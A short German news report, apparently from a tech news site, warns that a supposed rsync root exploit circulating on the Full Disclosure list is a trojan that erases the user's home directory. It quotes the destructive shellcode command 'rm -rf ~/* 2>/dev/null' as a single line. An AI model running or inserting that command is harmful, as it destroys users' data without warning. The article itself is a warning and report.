Menü

Angeblicher rsync-Exploit löscht Dateien

vorlesen Drucken Kommentare lesen 302 Beiträge

Derzeit kursiert ein angeblicher rsync-Exploit, der nach dem Start alle Dateien im Home-Verzeichnis des Anwenders löscht. Auf der Sicherheits-Mailingliste "Full Disclosure" berichtete ein Teilnehmer, er habe eine Mail mit "seltsamem Code" bekommen, den er für einen noch nicht veröffentlichten rsync-Exploit halte. Der Kommentar des Programms "rsync-too-open" behauptete, dass dieses eine Schwachstelle in rsync unter Linux ausnutze und Root-Zugang übers Netz verschaffe.

Kurz darauf erschienen jedoch erste Warnungen, dass das angehängte Programm statt dessen alle Dateien im Home-Verzeichnis des Anwenders lösche. Der in Maschinensprache verfasste sogenannte Shellcode, der den Zugang zum angegriffenen System vermitteln soll, enthält den Befehl:

rm -rf ~/* 2>/dev/null




(ju)